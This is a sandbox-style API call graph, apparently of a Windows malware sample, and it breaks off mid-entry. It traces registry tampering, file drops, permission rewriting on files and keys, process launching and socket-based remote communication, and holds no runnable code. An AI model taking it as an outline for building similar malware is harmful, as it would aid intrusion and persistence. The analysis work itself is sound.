API calls 14795->14796 14797 409a60 14796->14797 14797->14680 14797->14697 14797->14710 15133 401910 14798->15133 14801 40934a GetModuleHandleA GetModuleFileNameA 14803 40937f 14801->14803 14804 4093a4 14803->14804 14805 4093d9 14803->14805 14806 4093c3 wsprintfA 14804->14806 14807 409401 wsprintfA 14805->14807 14809 409415 14806->14809 14807->14809 14808 4094a0 15135 406edd 14808->15135 14809->14808 14811 406cc9 5 API calls 14809->14811 14818 409439 14811->14818 14812 4094ac 14813 40962f 14812->14813 14814 4094e8 RegOpenKeyExA 14812->14814 14819 409646 14813->14819 15156 401820 14813->15156 14816 409502 14814->14816 14817 4094fb 14814->14817 14821 40951f RegQueryValueExA 14816->14821 14817->14813 14823 40958a 14817->14823 14822 40ef1e lstrlenA 14818->14822 14828 4095d6 14819->14828 15162 4091eb 14819->15162 14825 409530 14821->14825 14826 409539 14821->14826 14827 409462 14822->14827 14823->14819 14824 409593 14823->14824 14824->14828 15143 40f0e4 14824->15143 14829 40956e RegCloseKey 14825->14829 14830 409556 RegQueryValueExA 14826->14830 14831 40947e wsprintfA 14827->14831 14828->14716 14828->14717 14829->14817 14830->14825 14830->14829 14831->14808 14833 4095bb 14833->14828 15150 4018e0 14833->15150 14836 402544 14835->14836 14837 40972d RegOpenKeyExA 14836->14837 14838 409740 14837->14838 14840 409765 14837->14840 14839 40974f RegDeleteValueA RegCloseKey 14838->14839 14839->14840 14840->14692 14842 402554 lstrcatA 14841->14842 14842->14732 14844 402544 14843->14844 14845 40919e wsprintfA 14844->14845 14846 4091bb 14845->14846 15201 409064 GetTempPathA 14846->15201 14849 4091d5 ShellExecuteA 14850 4091e7 14849->14850 14850->14676 15208 40dd05 GetTickCount 14851->15208 14853 40e538 15215 40dbcf 14853->15215 14855 40e544 14856 40e555 GetFileSize 14855->14856 14861 40e5b8 14855->14861 14857 40e5b1 CloseHandle 14856->14857 14858 40e566 14856->14858 14857->14861 15225 40db2e 14858->15225 15234 40e3ca RegOpenKeyExA 14861->15234 14862 40e576 ReadFile 14862->14857 14864 40e58d 14862->14864 15229 40e332 14864->15229 14866 40e5f2 14868 40e3ca 19 API calls 14866->14868 14869 40e629 14866->14869 14868->14869 14869->14633 14871 40eabe 14870->14871 14873 40eaba 14870->14873 14872 40dd05 6 API calls 14871->14872 14871->14873 14872->14873 14873->14637 14875 40ee2a 14874->14875 14876 401db4 GetVersionExA 14875->14876 14877 401dd0 GetSystemInfo GetModuleHandleA GetProcAddress 14876->14877 14879 401e24 14877->14879 14880 401e16 GetCurrentProcess 14877->14880 15287 40e819 14879->15287 14880->14879 14882 401e3d 14883 40e819 11 API calls 14882->14883 14884 401e4e 14883->14884 14885 401e77 14884->14885 15294 40df70 14884->15294 15303 40ea84 14885->15303 14888 401e6c 14890 40df70 12 API calls 14888->14890 14890->14885 14891 40e819 11 API calls 14892 401e93 14891->14892 15307 40199c inet_addr LoadLibraryA 14892->15307 14895 40e819 11 API calls 14896 401eb9 14895->14896 14897 401ed8 14896->14897 14898 40f04e 4 API calls 14896->14898 14899 40e819 11 API calls 14897->14899 14900 401ec9 14898->14900 14901 401eee 14899->14901 14902 40ea84 30 API calls 14900->14902 14903 401f0a 14901->14903 15320 401b71 14901->15320 14902->14897 14905 40e819 11 API calls 14903->14905 14907 401f23 14905->14907 14906 401efd 14908 40ea84 30 API calls 14906->14908 14909 401f3f 14907->14909 15324 401bdf 14907->15324 14908->14903 14911 40e819 11 API calls 14909->14911 14913 401f5e 14911->14913 14915 401f77 14913->14915 14916 40ea84 30 API calls 14913->14916 14914 40ea84 30 API calls 14914->14909 15331 4030b5 14915->15331 14916->14915 14918 401f8e GetTickCount 14918->14641 14920 406ec3 2 API calls 14920->14918 14923 406ec3 2 API calls 14922->14923 14924 4080eb 14923->14924 14925 4080f9 14924->14925 14926 4080ef 14924->14926 14928 40704c 16 API calls 14925->14928 15379 407ee6 14926->15379 14930 408110 14928->14930 14929 408269 CreateThread 14947 405e6c 14929->14947 14932 408156 RegOpenKeyExA 14930->14932 14933 4080f4 14930->14933 14931 40675c 21 API calls 14937 408244 14931->14937 14932->14933 14934 40816d RegQueryValueExA 14932->14934 14933->14929 14933->14931 14935 4081f7 14934->14935 14936 40818d 14934->14936 14938 40820d RegCloseKey 14935->14938 14940 40ec2e codecvt 4 API calls 14935->14940 14936->14935 14941 40ebcc 4 API calls 14936->14941 14937->14929 14939 40ec2e codecvt 4 API calls 14937->14939 14938->14933 14939->14929 14946 4081dd 14940->14946 14942 4081a0 14941->14942 14942->14938 14943 4081aa RegQueryValueExA 14942->14943 14943->14935 14944 4081c4 14943->14944 14945 40ebcc 4 API calls 14944->14945 14945->14946 14946->14938 15447 40ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 14947->15447 14949 405e71 15448 40e654 14949->15448 14951 405ec1 14952 403132 14951->14952 14953 40df70 12 API calls 14952->14953 14954 40313b 14953->14954 14955 40c125 14954->14955 15459 40ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 14955->15459 14957 40c12d 14958 40e654 13 API calls 14957->14958 14959 40c2bd 14958->14959 14960 40e654 13 API calls 14959->14960 14961 40c2c9 14960->14961 14962 40e654 13 API calls 14961->14962 14963 40a47a 14962->14963 14964 408db1 14963->14964 14965 408dbc 14964->14965 14966 40e654 13 API calls 14965->14966 14967 408dec Sleep 14966->14967 14967->14677 14969 40c92f 14968->14969 14970 40c93c 14969->14970 15460 40c517 14969->15460 14972 40ca2b 14970->14972 14973 40e819 11 API calls 14970->14973 14972->14677 14974 40c96a 14973->14974 14975 40e819 11 API calls 14974->14975 14976 40c97d 14975->14976 14977 40e819 11 API calls 14976->14977 14978 40c990 14977->14978 14979 40c9aa 14978->14979 14980 40ebcc 4 API calls 14978->14980 14979->14972 15477 402684 14979->15477 14980->14979 14985 40ca26 15484 40c8aa 14985->15484 14988 40ca44 14989 40ca4b closesocket 14988->14989 14990 40ca83 14988->14990 14989->14985 14991 40ea84 30 API calls 14990->14991 14992 40caac 14991->14992 14993 40f04e 4 API calls 14992->14993 14994 40cab2 14993->14994 14995 40ea84 30 API calls 14994->14995 14996 40caca 14995->14996 14997 40ea84 30 API calls 14996->14997 14998 40cad9 14997->14998 15492 40c65c 14998->15492 15001 40cb60 closesocket 15001->14972 15003 40dad2 closesocket 15004 40e318 23 API calls 15003->15004 15004->14972 15005 40df4c 20 API calls 15042 40cb70 15005->15042 15010 40e654 13 API calls 15010->15042 15014 40f04e LoadLibraryA GetProcAddress SystemTimeToFileTime GetSystemTimeAsFileTime 15014->15042 15017 40c65c send GetProcessHeap HeapSize GetProcessHeap HeapAlloc 15017->15042 15018 40d569 closesocket Sleep 15539 40e318 15018->15539 15019 40d815 wsprintfA 15019->15042 15020 40cc1c GetTempPathA 15020->15042 15021 40ea84 30 API calls 15021->15042 15023 407ead 6 API calls 15023->15042 15024 40c517 23 API calls 15024->15042 15025 40d582 ExitProcess 15026 40e8a1 30 API calls 15026->15042 15027 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 15027->15042 15028 40cfe3 GetSystemDirectoryA 15028->15042 15029 40675c 21 API calls 15029->15042 15030 40d027 GetSystemDirectoryA 15030->15042 15031 40cfad GetEnvironmentVariableA 15031->15042 15032 40d105 lstrcatA 15032->15042 15033 40ef1e lstrlenA 15033->15042 15034 40cc9f CreateFileA 15035 40ccc6 WriteFile 15034->15035 15034->15042 15037 40cdcc CloseHandle 15035->15037 15038 40cced CloseHandle 15035->15038 15036 40d15b CreateFileA 15039 40d182 WriteFile CloseHandle 15036->15039 15036->15042 15037->15042 15045 40cd2f 15038->15045 15039->15042 15040 40cd16 wsprintfA 15040->15045 15041 40d149 SetFileAttributesA 15041->15036 15042->15003 15042->15005 15042->15010 15042->15014 15042->15017 15042->15018 15042->15019 15042->15020 15042->15021 15042->15023 15042->15024 15042->15026 15042->15027 15042->15028 15042->15029 15042->15030 15042->15031 15042->15032 15042->15033 15042->15034 15042->15036 15042->15041 15043 40d36e GetEnvironmentVariableA 15042->15043 15044 40d1bf SetFileAttributesA 15042->15044 15046 408e26 GetSystemTime SystemTimeToFileTime CreateFileW DeviceIoControl CloseHandle 15042->15046 15047 40d22d GetEnvironmentVariableA 15042->15047 15049 40d3af lstrcatA 15042->15049 15051 407fcf 64 API calls 15042->15051 15052 40d3f2 CreateFileA 15042->15052 15058 40d3e0 SetFileAttributesA 15042->15058 15059 40d26e lstrcatA 15042->15059 15061 40d4b1 CreateProcessA 15042->15061 15062 40d2b1 CreateFileA 15042->15062 15064 40d452 SetFileAttributesA 15042->15064 15066 407ee6 64 API calls 15042->15066 15067 40d29f SetFileAttributesA 15042->15067 15070 40d31d SetFileAttributesA 15042->15070 15500 40c75d 15042->15500 15512 407e2f 15042->15512 15534 407ead 15042->15534 15544 4031d0 15042->15544 15561 403c09 15042->15561 15571 403a00 15042->15571 15575 40e7b4 15042->15575 15578 40c06c 15042->15578 15584 406f5f GetUserNameA 15042->15584 15595 40e854 15042->15595 15605 407dd6 15042->15605 15043->15042 15044->15042 15045->15040 15521 407fcf 15045->15521 15046->15042 15047->15042 15049->15042 15049->15052 15051->15042 15052->15042 15053 40d415 WriteFile CloseHandle 15052->15053 15053->15042 15054 40cd81 WaitForSingleObject CloseHandle CloseHandle 15056 40f04e 4 API calls 15054->15056 15055 40cda5 15057 407ee6 64 API calls 15055->15057 15056->15055 15060 40cdbd DeleteFileA 15057->15060 15058->15052 15059->15042 15059->15062 15060->15042 15061->15042 15063 40d4e8 CloseHandle CloseHandle 15061->15063 15062->15042 15065 40d2d8 WriteFile CloseHandle 15062->15065 15063->15042 15064->15042 15065->15042 15066->15042 15067->15062 15070->15042 15072 40741b 15071->15072 15073 406dc2 6 API calls 15072->15073 15074 40743f 15073->15074 15075 407469 RegOpenKeyExA 15074->15075 15077 4077f9 15075->15077 15087 407487 ___ascii_stricmp 15075->15087 15076 407703 RegEnumKeyA 15078 407714 RegCloseKey 15076->15078 15076->15087 15077->14744 15078->15077 15079 40f1a5 lstrlenA 15079->15087 15080 4074d2 RegOpenKeyExA 15080->15087 15081 40772c 15083 407742 RegCloseKey 15081->15083 15084 40774b 15081->15084 15082 407521 RegQueryValueExA 15082->15087 15083->15084 15086 4077ec RegCloseKey 15084->15086 15085 4076e4 RegCloseKey 15085->15087 15086->15077 15087->15076 15087->15079 15087->15080 15087->15081 15087->15082 15087->15085 15089 40777e GetFileAttributesExA 15087->15089 15090 407769 15087->15090 15088 4077e3 RegCloseKey 15088->15086 15089->15090 15090->15088 15092 407073 15091->15092 15093 4070b9 RegOpenKeyExA 15092->15093 15094 4070d0 15093->15094 15095 4071b8 15093->15095 15096 406dc2 6 API calls 15094->15096 15095->14748 15099 4070d5 15096->15099 15097 40719b RegEnumValueA 15098 4071af RegCloseKey 15097->15098 15097->15099 15098->15095 15099->15097 15101 4071d0 15099->15101 15114 40f1a5 lstrlenA 15099->15114 15102 407205 RegCloseKey 15101->15102 15103 407227 15101->15103 15102->15095 15104 4072b8 ___ascii_stricmp 15103->15104 15105 40728e RegCloseKey 15103->15105 15106 4072cd RegCloseKey 15104->15106 15107 4072dd 15104->15107 15105->15095 15106->15095 15108 407311 RegCloseKey 15107->15108 15110 407335 15107->15110 15108->15095 15109 4073d5 RegCloseKey 15111 4073e4 15109->15111 15110->15109 15112 40737e GetFileAttributesExA 15110->15112 15113 407397 15110->15113 15112->15113 15113->15109 15115 40f1c3 15114->15115 15115->15099 15117 406e5f LookupAccountNameW 15116->15117 15118 406e97 15116->15118 15117->15118 15118->14752 15120 40eb17 15119->15120 15121 40eb21 15119->15121 15129 40eae4 15120->15129 15121->14790 15125 4069b9 WriteFile 15123->15125 15126 4069ff 15125->15126 15127 406a3c 15125->15127 15126->15127 15128 406a10 WriteFile 15126->15128 15127->14786 15127->14787 15128->15126 15128->15127 15130 40eb02 GetProcAddress 15129->15130 15131 40eaed LoadLibraryA 15129->15131 15130->15121 15131->15130 15132 40eb01 15131->15132 15132->15121 15134 401924 GetVersionExA 15133->15134 15134->14801 15136 406eef AllocateAndInitializeSid 15135->15136 15142 406f55 15135->15142 15137 406f1c CheckTokenMembership 15136->15137 15140 406f44 15136->15140 15138 406f3b FreeSid 15137->15138 15139 406f2e 15137->15139 15138->15140 15139->15138 15141 406e36 2 API calls 15140->15141 15140->15142 15141->15142 15142->14812 15144 40f0f1 15143->15144 15145 40f0ed 15143->15145 15146 40f119 15144->15146 15147 40f0fa lstrlenA SysAllocStringByteLen 15144->15147 15145->14833 15149 40f11c MultiByteToWideChar 15146->15149 15148 40f117 15147->15148 15147->15149 15148->14833 15149->15148 15151 401820 17 API calls 15150->15151 15153 4018f2 15151->15153 15152 4018f9 15152->14828 15153->15152 15167 401280 15153->15167 15155 401908 15155->14828 15180 401000 15156->15180 15158 401839 15159 401851 GetCurrentProcess 15158->15159 15160 40183d 15158->15160 15161 401864 15159->15161 15160->14819 15161->14819 15163 40920e 15162->15163 15166 409308 15162->15166 15163->15163 15164 4092f1 Sleep 15163->15164 15165 4092bf ShellExecuteA 15163->15165 15163->15166 15164->15163 15165->15163 15165->15166 15166->14828 15170 4012e1 ShellExecuteExW 15167->15170 15169 4016f9 GetLastError 15176 401699 15169->15176 15170->15169 15177 4013a8 15170->15177 15171 401570 lstrlenW 15171->15177 15172 4015be GetStartupInfoW 15172->15177 15173 4015ff CreateProcessWithLogonW 15174 4016bf GetLastError 15173->15174 15175 40163f WaitForSingleObject 15173->15175 15174->15176 15175->15177 15178 401659 CloseHandle 15175->15178 15176->15155 15177->15171 15177->15172 15177->15173 15177->15176 15179 401668 CloseHandle 15177->15179 15178->15177 15179->15177 15181 40100d LoadLibraryA 15180->15181 15196 401023 15180->15196 15182 401021 15181->15182 15181->15196 15182->15158 15183 4010b5 GetProcAddress 15184 4010d1 GetProcAddress 15183->15184 15185 40127b 15183->15185 15184->15185 15186 4010f0 GetProcAddress 15184->15186 15185->15158 15186->15185 15187 401110 GetProcAddress 15186->15187 15187->15185 15188 401130 GetProcAddress 15187->15188 15188->15185 15189 40114f GetProcAddress 15188->15189 15189->15185 15190 40116f GetProcAddress 15189->15190 15190->15185 15191 40118f GetProcAddress 15190->15191 15191->15185 15192 4011ae GetProcAddress 15191->15192 15192->15185 15193 4011ce GetProcAddress 15192->15193 15193->15185 15194 4011ee GetProcAddress 15193->15194 15194->15185 15195 401209 GetProcAddress 15194->15195 15195->15185 15197 401225 GetProcAddress 15195->15197 15196->15183 15200 4010ae 15196->15200 15197->15185 15198 401241 GetProcAddress 15197->15198 15198->15185 15199 40125c GetProcAddress 15198->15199 15199->15185 15200->15158 15202 40908d 15201->15202 15203 4090e2 wsprintfA 15202->15203 15204 40ee2a 15203->15204 15205 4090fd CreateFileA 15204->15205 15206 40911a lstrlenA WriteFile CloseHandle 15205->15206 15207 40913f 15205->15207 15206->15207 15207->14849 15207->14850 15209 40dd41 InterlockedExchange 15208->15209 15210 40dd20 GetCurrentThreadId 15209->15210 15214 40dd4a 15209->15214 15211 40dd53 GetCurrentThreadId 15210->15211 15212 40dd2e GetTickCount 15210->15212 15211->14853 15213 40dd39 Sleep 15212->15213 15212->15214 15213->15209 15214->15211 15216 40dbf0 15215->15216 15248 40db67 GetEnvironmentVariableA 15216->15248 15218 40dcda 15218->14855 15219 40dc19 15219->15218 15220 40db67 3 API calls 15219->15220 15221 40dc5c 15220->15221 15221->15218 15222 40db67 3 API calls 15221->15222 15223 40dc9b 15222->15223 15223->15218 15224 40db67 3 API calls 15223->15224 15224->15218 15226 40db55 15225->15226 15227 40db3a 15225->15227 15226->14857 15226->14862 15252 40ebed 15227->15252 15261 40f04e SystemTimeToFileTime GetSystemTimeAsFileTime 15229->15261 15231 40e3be 15231->14857 15232 40e342 15232->15231 15264 40de24 15232->15264 15235 40e528 15234->15235 15236 40e3f4 15234->15236 15235->14866 15237 40e434 RegQueryValueExA 15236->15237 15238 40e458 15237->15238 15239 40e51d RegCloseKey 15237->15239 15240 40e46e RegQueryValueExA 15238->15240 15239->15235 15240->15238 15241 40e488 15240->15241 15241->15239 15242 40db2e 8 API calls 15241->15242 15243 40e499 15242->15243 15243->15239 15244 40e4b9 RegQueryValueExA 15243->15244 15245 40e4e8 15243->15245 15244->15243 15244->15245 15245->15239 15246 40e332 14 API calls 15245->15246 15247 40e513 15246->15247 15247->15239 15249 40db89 lstrcpyA CreateFileA 15248->15249 15250 40dbca 15248->15250 15249->15219 15250->15219 15253 40ec01 15252->15253 15254 40ebf6 15252->15254 15256 40eba0 codecvt 2 API calls 15253->15256 15255 40ebcc 4 API calls 15254->15255 15257 40ebfe 15255->15257 15258 40ec0a GetProcessHeap HeapReAlloc 15256->15258 15257->15226 15259 40eb74 2 API calls 15258->15259 15260 40ec28 15259->15260 15260->15226 15275 40eb41 15261->15275 15265 40de3a 15264->15265 15268 40de4e 15265->15268 15279 40dd84 15265->15279 15268->15232 15269 40de76 15283 40ddcf 15269->15283 15270 40ebed 8 API calls 15273 40def6 15270->15273 15272 40de9e 15272->15268 15272->15270 15273->15268 15274 40ddcf lstrcmpA 15273->15274 15274->15268 15276 40eb4a 15275->15276 15278 40eb54 15275->15278 15277 40eae4 2 API calls 15276->15277 15277->15278 15278->15232 15280 40ddc5 15279->15280 15281 40dd96 15279->15281 15280->15269 15280->15272 15281->15280 15282 40ddad lstrcmpiA 15281->15282 15282->15280 15282->15281 15284 40de20 15283->15284 15285 40dddd 15283->15285 15284->15268 15285->15284 15286 40ddfa lstrcmpA 15285->15286 15286->15285 15288 40dd05 6 API calls 15287->15288 15289 40e821 15288->15289 15290 40dd84 lstrcmpiA 15289->15290 15291 40e82c 15290->15291 15293 40e844 15291->15293 15335 402480 15291->15335 15293->14882 15295 40dd05 6 API calls 15294->15295 15296 40df7c 15295->15296 15297 40dd84 lstrcmpiA 15296->15297 15302 40df89 15297->15302 15298 40dfc4 15298->14888 15299 40ddcf lstrcmpA 15299->15302 15300 40ec2e codecvt 4 API calls 15300->15302 15301 40dd84 lstrcmpiA 15301->15302 15302->15298 15302->15299 15302->15300 15302->15301 15304 40ea98 15303->15304 15344 40e8a1 15304->15344 15306 401e84 15306->14891 15308 4019d5 GetProcAddress GetProcAddress GetProcAddress 15307->15308 15311 4019ce 15307->15311 15309 401ab3 FreeLibrary 15308->15309 15310 401a04 15308->15310 15309->15311 15310->15309 15312 401a14 GetProcessHeap 15310->15312 15311->14895 15312->15311 15314 401a2e HeapAlloc 15312->15314 15314->15311 15315 401a42 15314->15315 15316 401a52 HeapReAlloc 15315->15316 15318 401a62 15315->15318 15316->15318 15317 401aa1 FreeLibrary 15317->15311 15318->15317 15319 401a96 HeapFree 15318->15319 15319->15317 15372 401ac3 LoadLibraryA 15320->15372 15323 401bcf 15323->14906 15325 401ac3 12 API calls 15324->15325 15326 401c09 15325->15326 15327 401c0d GetComputerNameA 15326->15327 15330 401c41 15326->15330 15328 401c45 GetVolumeInformationA 15327->15328 15329 401c1f 15327->15329 15328->15330 15329->15328 15329->15330 15330->14914 15332 40ee2a 15331->15332 15333 4030d0 gethostname gethostbyname 15332->15333 15334 401f82 15333->15334 15334->14918 15334->14920 15338 402419 lstrlenA 15335->15338 15337 402491 15337->15293 15339 402474 15338->15339 15340 40243d lstrlenA 15338->15340 15339->15337 15341 402464 lstrlenA 15340->15341 15342 40244e lstrcmpiA 15340->15342 15341->15339 15341->15340 15342->15341 15343 40245c 15342->15343 15343->15339 15343->15341 15345 40dd05 6 API calls 15344->15345 15346 40e8b4 15345->15346 15347 40dd84 lstrcmpiA 15346->15347 15348 40e8c0 15347->15348 15349 40e90a 15348->15349 15350 40e8c8 lstrcpynA 15348->15350 15351 402419 4 API calls 15349->15351 15360 40ea27 15349->15360 15352 40e8f5 15350->15352 15353 40e926 lstrlenA lstrlenA 15351->15353 15365 40df4c 15352->15365 15355 40e96a 15353->15355 15356 40e94c lstrlenA 15353->15356 15359 40ebcc 4 API calls 15355->15359 15355->15360 15356->15355 15357 40e901 15358 40dd84 lstrcmpiA 15357->15358 15358->15349 15361 40e98f 15359->15361 15360->15306 15361->15360 15362 40df4c 20 API calls 15361->15362 15363 40ea1e 15362->15363 15364 40ec2e codecvt 4 API calls 15363->15364 15364->15360 15366 40dd05 6 API calls 15365->15366 15367 40df51 15366->15367 15368 40f04e 4 API calls 15367->15368 15369 40df58 15368->15369 15370 40de24 10 API calls 15369->15370 15371 40df63 15370->15371 15371->15357 15373 401ae2 GetProcAddress 15372->15373 15374 401b68 GetComputerNameA GetVolumeInformationA 15372->15374 15373->15374 15375 401af5 15373->15375 15374->15323 15376 40ebed 8 API calls 15375->15376 15377 401b29 15375->15377 15376->15375 15377->15374 15378 40ec2e codecvt 4 API calls 15377->15378 15378->15374 15380 406ec3 2 API calls 15379->15380 15381 407ef4 15380->15381 15382 4073ff 17 API calls 15381->15382 15391 407fc9 15381->15391 15383 407f16 15382->15383 15383->15391 15392 407809 GetUserNameA 15383->15392 15385 407f63 15386 40ef1e lstrlenA 15385->15386 15385->15391 15387 407fa6 15386->15387 15388 40ef1e lstrlenA 15387->15388 15389 407fb7 15388->15389 15416 407a95 RegOpenKeyExA 15389->15416 15391->14933 15393 40783d LookupAccountNameA 15392->15393 15399 407a8d 15392->15399 15394 407874 GetLengthSid GetFileSecurityA 15393->15394 15393->15399 15395 4078a8 GetSecurityDescriptorOwner 15394->15395 15394->15399 15396 4078c5 EqualSid 15395->15396 15397 40791d GetSecurityDescriptorDacl 15395->15397 15396->15397 15398 4078dc LocalAlloc 15396->15398 15397->15399 15410 407941 15397->15410 15398->15397 15400 4078ef InitializeSecurityDescriptor 15398->15400 15399->15385 15401 407916 LocalFree 15400->15401 15402 4078fb SetSecurityDescriptorOwner 15400->15402 15401->15397 15402->15401 15404 40790b SetFileSecurityA 15402->15404 15403 40795b GetAce 15403->15410 15404->15401 15405 407980 EqualSid 15405->15410 15406 407a3d 15406->15399 15409 407a43 LocalAlloc 15406->15409 15407 4079be EqualSid 15407->15410 15408 40799d DeleteAce 15408->15410 15409->15399 15411 407a56 InitializeSecurityDescriptor 15409->15411 15410->15399 15410->15403 15410->15405 15410->15406 15410->15407 15410->15408 15412 407a62 SetSecurityDescriptorDacl 15411->15412 15413 407a86 LocalFree 15411->15413 15412->15413 15414 407a73 SetFileSecurityA 15412->15414 15413->15399 15414->15413 15415 407a83 15414->15415 15415->15413 15417 407ac4 15416->15417 15418 407acb GetUserNameA 15416->15418 15417->15391 15419 407da7 RegCloseKey 15418->15419 15420 407aed LookupAccountNameA 15418->15420 15419->15417 15420->15419 15421 407b24 RegGetKeySecurity 15420->15421 15421->15419 15422 407b49 GetSecurityDescriptorOwner 15421->15422 15423 407b63 EqualSid 15422->15423 15424 407bb8 GetSecurityDescriptorDacl 15422->15424 15423->15424 15426 407b74 LocalAlloc 15423->15426 15425 407da6 15424->15425 15433 407bdc 15424->15433 15425->15419 15426->15424 15427 407b8a InitializeSecurityDescriptor 15426->15427 15429 407bb1 LocalFree 15427->15429 15430 407b96 SetSecurityDescriptorOwner 15427->15430 15428 407bf8 GetAce 15428->15433 15429->15424 15430->15429 15431 407ba6 RegSetKeySecurity 15430->15431 15431->15429 15432 407c1d EqualSid 15432->15433 15433->15425 15433->15428 15433->15432 15434 407cd9 15433->15434 15435 407c5f EqualSid 15433->15435 15436 407c3a DeleteAce 15433->15436 15434->15425 15437 407d5a LocalAlloc 15434->15437 15439 407cf2 RegOpenKeyExA 15434->15439 15435->15433 15436->15433 15437->15425 15438 407d70 InitializeSecurityDescriptor 15437->15438 15440 407d7c SetSecurityDescriptorDacl 15438->15440 15441 407d9f LocalFree 15438->15441 15439->15437 15444 407d0f 15439->15444 15440->15441 15442 407d8c RegSetKeySecurity 15440->15442 15441->15425 15442->15441 15443 407d9c 15442->15443 15443->15441 15445 407d43 RegSetValueExA 15444->15445 15445->15437 15446 407d54 15445->15446 15446->15437 15447->14949 15449 40dd05 6 API calls 15448->15449 15452 40e65f 15449->15452 15450 40e6a5 15451 40ebcc 4 API calls 15450->15451 15456 40e6f5 15450->15456 15454 40e6b0 15451->15454 15452->15450 15453 40e68c lstrcmpA 15452->15453 15453->15452 15455 40e6e0 lstrcpynA 15454->15455 15454->15456 15458 40e6b7 15454->15458 15455->15456 15457 40e71d lstrcmpA 15456->15457 15456->15458 15457->15456 15458->14951 15459->14957 15461 40c525 15460->15461 15462 40c532 15460->15462 15461->15462 15464 40ec2e codecvt 4 API calls 15461->15464 15463 40c548 15462->15463 15612 40e7ff 15462->15612 15466 40e7ff lstrcmpiA 15463->15466 15474 40c54f 15463->15474 15464->15462 15467 40c615 15466->15467 15470 40ebcc 4 API calls 15467->15470 15467->15474 15468 40c5d1 15472 40ebcc 4 API calls 15468->15472 15470->15474 15471 40e819 11 API calls 15473 40c5b7 15471->15473 15472->15474 15475 40f04e 4 API calls 15473->15475 15474->14970 15476 40c5bf 15475->15476 15476->15463 15476->15468 15478 402692 inet_addr 15477->15478 15479 40268e 15477->15479 15478->15479 15480 40269e gethostbyname 15478->15480 15481 40f428 15479->15481 15480->15479 15615 40f315 15481->15615 15485 40c8d2 15484->15485 15486 40c907 15485->15486 15487 40c517 23 API calls 15485->15487 15486->14972 15487->15486 15488 40f43e 15489 40f473 recv 15488->15489 15490 40f47c 15489->15490 15491 40f458 15489->15491 15490->14988 15491->15489 15491->15490 15493 40c670 15492->15493 15494 40c67d 15492->15494 15495 40ebcc 4 API calls 15493->15495 15496 40ebcc 4 API calls 15494->15496 15498 40c699 15494->15498 15495->15494 15496->15498 15497 40c6f3 15497->15001 15497->15042 15498->15497 15499 40c73c send 15498->15499 15499->15497 15501 40c770 15500->15501 15502 40c77d 15500->15502 15503 40ebcc 4 API calls 15501->15503 15504 40ebcc 4 API calls 15502->15504 15506 40c799 15502->15506 15503->15502 15504->15506 15505 40c7b5 15508 40f43e recv 15505->15508 15506->15505 15507 40ebcc 4 API calls 15506->15507 15507->15505 15509 40c7cb 15508->15509 15510 40f43e recv 15509->15510 15511 40c7d3 15509->15511 15510->15511 15511->15042 15628 407db7 15512->15628 15515 407e70 15517 407e96 15515->15517 15519 40f04e 4 API calls 15515->15519 15516 40f04e 4 API calls 15518 407e4c 15516->15518 15517->15042 15518->15515 15520 40f04e 4 API calls 15518->15520 15519->15517 15520->15515 15522 406ec3 2 API calls 15521->15522 15523 407fdd 15522->15523 15524 4073ff 17 API calls 15523->15524 15533 4080c2 CreateProcessA 15523->15533 15525 407fff 15524->15525 15526 407809 21 API calls 15525->15526 15525->15533 15527 40804d 15526->15527 15528 40ef1e lstrlenA 15527->15528 15527->15533 15529 40809e 15528->15529 15530 40ef1e lstrlenA 15529->15530 15531 4080af 15530->15531 15532 407a95 24 API calls 15531->15532 15532->15533 15533->15054 15533->15055 15535 407db7 2 API calls 15534->15535 15536 407eb8 15535->15536 15537 40f04e 4 API calls 15536->15537 15538 407ece DeleteFileA 15537->15538 15538->15042 15540 40dd05 6 API calls 15539->15540 15541 40e31d 15540->15541 15632 40e177 15541->15632 15543 40e326 15543->15025 15545 4031f3 15544->15545 15546 4031ec 15544->15546 15547 40ebcc 4 API calls 15545->15547 15546->15042 15560 4031fc 15547->15560 15548 403459 15551 40f04e 4 API calls 15548->15551 15549 40349d 15550 40ec2e codecvt 4 API calls 15549->15550 15550->15546 15552 40345f 15551->15552 15553 4030fa 4 API calls 15552->15553 15553->15546 15554 40ebcc GetProcessHeap HeapSize GetProcessHeap HeapAlloc 15554->15560 15555 40344d 15556 40ec2e codecvt 4 API calls 15555->15556 15557 40344b 15556->15557 15557->15548 15557->15549 15559 403141 lstrcmpiA 15559->15560 15560->15546 15560->15554 15560->15555 15560->15557 15560->15559 15658 4030fa GetTickCount 15560->15658 15562 4030fa 4 API calls 15561->15562 15563 403c1a 15562->15563 15564 403ce6 15563->15564 15663 403a72 15563->15663 15564->15042 15567 403a72 9 API calls 15569 403c5e 15567->15569 15568 403a72 9 API calls 15568->15569 15569->15564 15569->15568 15570 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 15569->15570 15570->15569 15572 403a10 15571->15572 15573 4030fa 4 API calls 15572->15573 15574 403a1a 15573->15574 15574->15042 15576 40dd05 6 API calls 15575->15576 15577 40e7be 15576->15577 15577->15042 15579 40c105 15578->15579 15580 40c07e wsprintfA 15578->15580 15579->15042 15672 40bfce GetTickCount wsprintfA 15580->15672 15582 40c0ef 15673 40bfce GetTickCount wsprintfA 15582->15673 15585 407047 15584->15585 15586 406f88 LookupAccountNameA 15584->15586 15585->15042 15588 407025 15586->15588 15589 406fcb 15586->15589 15590 406edd 5 API calls 15588->15590 15591 406fdb ConvertSidToStringSidA 15589->15591 15592 40702a wsprintfA 15590->15592 15591->15588 15593 406ff1 15591->15593 15592->15585 15594 407013 LocalFree 15593->15594 15594->15588 15596 40dd05 6 API calls 15595->15596 15597 40e85c 15596->15597 15598 40dd84 lstrcmpiA 15597->15598 15599 40e867 15598->15599 15600 40e885 lstrcpyA 15599->15600 15674 4024a5 15599->15674 15677 40dd69 15600->15677 15606 407db7 2 API calls 15605->15606 15607 407de1 15606->15607 15608 407e16 15607->15608 15609 40f04e 4 API calls 15607->15609 15608->15042 15610 407df2 15609->15610 15610->15608 15611 40f04e 4 API calls 15610->15611 15611->15608 15613 40dd84 lstrcmpiA 15612->15613 15614 40c58e 15613->15614 15614->15463 15614->15468 15614->15471 15616 40ca1d 15615->15616 15617 40f33b 15615->15617 15616->14985 15616->15488 15618 40f347 htons socket 15617->15618 15619 40f382 ioctlsocket 15618->15619 15620 40f374 closesocket 15618->15620 15621 40f3aa connect select 15619->15621 15622 40f39d 15619->15622 15620->15616 15621->15616 15624 40f3f2 __WSAFDIsSet 15621->15624 15623 